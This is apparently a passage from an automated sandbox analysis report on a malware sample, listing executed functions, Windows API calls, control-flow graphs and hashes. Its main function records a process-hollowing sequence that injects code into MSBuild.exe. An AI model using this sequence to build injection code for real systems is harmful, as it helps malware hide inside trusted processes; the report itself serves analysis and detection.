22321->22335 22322->22321 22323 edec79 22322->22323 22325 ede98c __fread_nolock 29 API calls 22322->22325 22323->22321 22326 ede98c __fread_nolock 29 API calls 22323->22326 22327 edec70 22325->22327 22328 edec85 CloseHandle 22326->22328 22329 ede98c __fread_nolock 29 API calls 22327->22329 22328->22321 22330 edec91 GetLastError 22328->22330 22329->22323 22330->22321 22331 edec9f __fread_nolock 22331->22314 22344 edebf8 LeaveCriticalSection 22332->22344 22334 edede2 22334->22309 22336 edea6c 22335->22336 22338 edea05 22335->22338 22337 ed34c5 __strnicoll 14 API calls 22336->22337 22339 edea71 22337->22339 22338->22336 22343 edea2f 22338->22343 22340 ed34d8 __dosmaperr 14 API calls 22339->22340 22341 edea5c 22340->22341 22341->22331 22342 edea56 SetStdHandle 22342->22341 22343->22341 22343->22342 22344->22334 22345->22302 22346->22273

                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                  Function 00EF21A9 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295threadinjectionmemoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00EF211B,00EF210B), ref: 00EF233F
                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00EF2352
                                                                                                                                                                                                                                                                  • Wow64GetThreadContext.KERNEL32(00000088,00000000), ref: 00EF2370
                                                                                                                                                                                                                                                                  • ReadProcessMemory.KERNELBASE(00000140,?,00EF215F,00000004,00000000), ref: 00EF2394
                                                                                                                                                                                                                                                                  • VirtualAllocEx.KERNELBASE(00000140,?,?,00003000,00000040), ref: 00EF23BF
                                                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(00000140,00000000,?,?,00000000,?), ref: 00EF2417
                                                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(00000140,00400000,?,?,00000000,?,00000028), ref: 00EF2462
                                                                                                                                                                                                                                                                  • WriteProcessMemory.KERNELBASE(00000140,?,?,00000004,00000000), ref: 00EF24A0
                                                                                                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(00000088,00A10000), ref: 00EF24DC
                                                                                                                                                                                                                                                                  • ResumeThread.KERNELBASE(00000088), ref: 00EF24EB
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                                                                                                                  • API String ID: 2687962208-3857624555
                                                                                                                                                                                                                                                                  • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                                                                                  • Instruction ID: 23a453417767e844b6db927f33d68acc3b944dca74e6d6d9e697c4b66d58f27a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56B1097260164AAFDB60CF68CC80BEA73A5FF88714F158158EA0CAB341D774FA51CB94
                                                                                                                                                                                                                                                                  Function 00ED8362 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 26 ed8362-ed836e 27 ed8400-ed8403 26->27 28 ed8409 27->28 29 ed8373-ed8384 27->29 30 ed840b-ed840f 28->30 31 ed8386-ed8389 29->31 32 ed8391-ed83aa LoadLibraryExW 29->32 33 ed838f 31->33 34 ed8429-ed842b 31->34 35 ed83ac-ed83b5 GetLastError 32->35 36 ed8410-ed8420 32->36 38 ed83fd 33->38 34->30 39 ed83ee-ed83fb 35->39 40 ed83b7-ed83c9 call edb8f3 35->40 36->34 37 ed8422-ed8423 FreeLibrary 36->37 37->34 38->27 39->38 40->39 43 ed83cb-ed83dd call edb8f3 40->43 43->39 46 ed83df-ed83ec LoadLibraryExW 43->46 46->36 46->39
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,A38A0892,?,00ED8471,?,?,00000000), ref: 00ED8423
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                  • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                                  • Opcode ID: cc476ab74e44742f1fbc118ba93f06a3b19defdfd177c2fb5f80338bb1a3ce82
                                                                                                                                                                                                                                                                  • Instruction ID: 22a6a29d2f4f5e68c797249eee7ce249c2c8e91f694e7795e071de4cd3f39d0a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc476ab74e44742f1fbc118ba93f06a3b19defdfd177c2fb5f80338bb1a3ce82
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7212732A01215ABC7219B66EE80B6F3758EB81764F251222E915B73D2EF30ED02C6D0
                                                                                                                                                                                                                                                                  Function 00EF57C0 Relevance: 9.2, APIs: 6, Instructions: 162fileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1378416451-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5ec95fbf90a7b7719f4568e9df8b932412f017c3129f4be9fac1124df01db11a
                                                                                                                                                                                                                                                                  • Instruction ID: 6c6634b2de87a2b2c47519ddccf7bef417b9efa17941094ba8522192d3e2b6d3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ec95fbf90a7b7719f4568e9df8b932412f017c3129f4be9fac1124df01db11a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6871D0B1D04648CFCB04EFA8D588BADBBF0BF98314F108529E599AB341D774A949CF52
                                                                                                                                                                                                                                                                  Function 00EDEF5F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 196fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 81 edef5f-edef81 82 edf174 81->82 83 edef87-edef89 81->83 86 edf176-edf17a 82->86 84 edef8b-edefaa call ed3d59 83->84 85 edefb5-edefd8 83->85 92 edefad-edefb0 84->92 88 edefde-edefe4 85->88 89 edefda-edefdc 85->89 88->84 91 edefe6-edeff7 88->91 89->88 89->91 93 edeff9-edf007 call eddd0f 91->93 94 edf00a-edf01a call edf28c 91->94 92->86 93->94 99 edf01c-edf022 94->99 100 edf063-edf075 94->100 103 edf04b-edf061 call edf309 99->103 104 edf024-edf027 99->104 101 edf0cc-edf0ec WriteFile 100->101 102 edf077-edf07d 100->102 107 edf0ee-edf0f4 GetLastError 101->107 108 edf0f7 101->108 110 edf07f-edf082 102->110 111 edf0b8-edf0c5 call edf738 102->111 122 edf044-edf046 103->122 105 edf029-edf02c 104->105 106 edf032-edf041 call edf6d0 104->106 105->106 112 edf10c-edf10f 105->112 106->122 107->108 116 edf0fa-edf105 108->116 117 edf0a4-edf0b6 call edf8fc 110->117 118 edf084-edf087 110->118 121 edf0ca 111->121 125 edf112-edf114 112->125 123 edf16f-edf172 116->123 124 edf107-edf10a 116->124 128 edf09f-edf0a2 117->128 118->125 126 edf08d-edf09a call edf813 118->126 121->128 122->116 123->86 124->112 129 edf116-edf11b 125->129 130 edf142-edf14e 125->130 126->128 128->122 134 edf11d-edf12f 129->134 135 edf134-edf13d call ed3551 129->135 132 edf158-edf16a 130->132 133 edf150-edf156 130->133 132->92 133->82 133->132 134->92 135->92
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00EDF309: GetConsoleOutputCP.KERNEL32(A38A0892,00000000,00000000,?), ref: 00EDF36C
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00ED434B,?), ref: 00EDF0E4
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00ED434B,?,00ED458F,00000000,?,00000000,00ED458F,?,?,?,00EF16F0,0000002C,00ED447B,?), ref: 00EDF0EE
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                                                  • String ID: KC
                                                                                                                                                                                                                                                                  • API String ID: 2915228174-345211725
                                                                                                                                                                                                                                                                  • Opcode ID: a1283e75346e91b1ee46a35794e98ba94ebb9165fbaba894d56da2e3fa2e78fb
                                                                                                                                                                                                                                                                  • Instruction ID: d35b8d3d0809f0b63b418d80e249e94dd4fda6f1dff7efd18ba0dfbd4f11f1c1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a1283e75346e91b1ee46a35794e98ba94ebb9165fbaba894d56da2e3fa2e78fb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82618F71D04159AFDF11DFA8C884AEEBBB9EF49308F145166E805BB352D732DA06CB90
                                                                                                                                                                                                                                                                  Function 00EF52D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 156COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 138 ef52d0-ef5304 139 ef530e-ef5318 138->139 140 ef531e-ef536b 139->140 141 ef5370-ef537a 139->141 140->139 142 ef5384-ef538e 141->142 143 ef5394-ef53fb call ec10e0 142->143 144 ef5400-ef5414 142->144 143->142 146 ef541e-ef5427 144->146 148 ef542d-ef5431 146->148 149 ef55b6-ef55c8 call ec8eaa 146->149 151 ef5437-ef5481 KiUserExceptionDispatcher 148->151 152 ef5556-ef55b1 148->152 154 ef550e-ef5551 call ec10e0 151->154 155 ef5487-ef54a0 call ed520c 151->155 152->146 154->152 159 ef54d6-ef54fd GetLastError call ec14e0 call ec1470 155->159 160 ef54a6-ef54c9 call ec1110 call ec1470 155->160 169 ef5500-ef5509 call ed4c7a 159->169 167 ef54ce-ef54d1 160->167 167->169 169->154
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • KiUserExceptionDispatcher.NTDLL ref: 00EF5450
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00EF54D6
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: DispatcherErrorExceptionLastUser
                                                                                                                                                                                                                                                                  • String ID: [+]
                                                                                                                                                                                                                                                                  • API String ID: 2542788420-4228040803
                                                                                                                                                                                                                                                                  • Opcode ID: a5e5547a70808ddcd899f23e387936c75c10648dde6429f60cb739ecdbe36187
                                                                                                                                                                                                                                                                  • Instruction ID: 9ddf7eba73f5d4cd3b76f11925dc3fe99e14ba3122dbe5b9982fd4fc8bfb387c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5e5547a70808ddcd899f23e387936c75c10648dde6429f60cb739ecdbe36187
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA7139B594922D8BCB24EF58D9987E9BBF0AF68304F1040E9E88DA7341D6749AC4CF51
                                                                                                                                                                                                                                                                  Function 00EF5660 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • FreeConsole.KERNELBASE ref: 00EF56CA
                                                                                                                                                                                                                                                                    • Part of subcall function 00EF52D0: KiUserExceptionDispatcher.NTDLL ref: 00EF5450
                                                                                                                                                                                                                                                                    • Part of subcall function 00EF52D0: GetLastError.KERNEL32 ref: 00EF54D6
                                                                                                                                                                                                                                                                  • VirtualProtect.KERNELBASE ref: 00EF577A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ConsoleDispatcherErrorExceptionFreeLastProtectUserVirtual
                                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                                  • API String ID: 1907986952-2766056989
                                                                                                                                                                                                                                                                  • Opcode ID: ccdbf4af372b87122300cf3963f5f31e4bcec2b93cffcc3dc875fbb14b12e67a
                                                                                                                                                                                                                                                                  • Instruction ID: 300c1f8c95627cc130e82f8fb998f17f88a0724b2a374734be6d80720793e908
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ccdbf4af372b87122300cf3963f5f31e4bcec2b93cffcc3dc875fbb14b12e67a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C541CDB0D01208DFDB04EFA9D5856AEBBF0FF88314F508529E558AB350D775A944CF91
                                                                                                                                                                                                                                                                  Function 00ED1131 Relevance: 4.6, APIs: 3, Instructions: 51threadCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 187 ed1131-ed113c 188 ed113e-ed1151 call ed34c5 call ed3bb0 187->188 189 ed1152-ed1165 call ed11c2 187->189 194 ed1167-ed1184 CreateThread 189->194 195 ed1193 189->195 198 ed1186-ed1192 GetLastError call ed34eb 194->198 199 ed11a2-ed11a7 194->199 200 ed1195-ed11a1 call ed1212 195->200 198->195 203 ed11ae-ed11b2 199->203 204 ed11a9-ed11ac 199->204 203->200 204->203
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateThread.KERNELBASE(?,?,Function_00011249,00000000,?,?), ref: 00ED117A
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,00EC87F7), ref: 00ED1186
                                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00ED118D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2744730728-0
                                                                                                                                                                                                                                                                  • Opcode ID: 44df55100dfb214d82d492578adabc3d1231c33a4aad3c2d7860a7f4106d69ff
                                                                                                                                                                                                                                                                  • Instruction ID: 15d17d865fe7a27227eefd9e2332150632780fc961273576f10100421bd93183
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44df55100dfb214d82d492578adabc3d1231c33a4aad3c2d7860a7f4106d69ff
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2018C32501209BFDF159FB1CC06AAE7BA9EF40364F10509AF911B6250DB71CE42EB90
                                                                                                                                                                                                                                                                  Function 00EDF738 Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 207 edf738-edf78d call ecc0a0 210 edf78f 207->210 211 edf802-edf812 call ec8eaa 207->211 213 edf795 210->213 215 edf79b-edf79d 213->215 216 edf79f-edf7a4 215->216 217 edf7b7-edf7dc WriteFile 215->217 218 edf7ad-edf7b5 216->218 219 edf7a6-edf7ac 216->219 220 edf7de-edf7e9 217->220 221 edf7fa-edf800 GetLastError 217->221 218->215 218->217 219->218 220->211 222 edf7eb-edf7f6 220->222 221->211 222->213 223 edf7f8 222->223 223->211
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00EDF0CA,00000000,00ED458F,?,00000000,?,00000000), ref: 00EDF7D4
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00EDF0CA,00000000,00ED458F,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00ED434B), ref: 00EDF7FA
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2160373649.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160345994.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160407064.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160429654.0000000000EF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160447933.0000000000EF3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160467900.0000000000EF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160486409.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2160515823.0000000000EFA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_ec0000_8ZVMneG.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 442123175-0
                                                                                                                                                                                                                                                                  • Opcode ID: 6a7d488dceb0892bf31ec2110c07b8d90b1cdf22da62a8c5f687135b0dcb0a9c
                                                                                                                                                                                                                                                                  • Instruction ID: 27717e434f57ddb2ff8f8949f227483ec5691be54bb9961af20ae7f9e5faffe2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a7d488dceb0892bf31ec2110c07b8d90b1cdf22da62a8c5f687135b0dcb0a9c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33218D35A002199FCB19CF29DD809E9B7F9EB88305F2440BAE90AE7351D7309E47CB60
                                                                                                                                                                                                                                                                  Function 00ED8E82 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
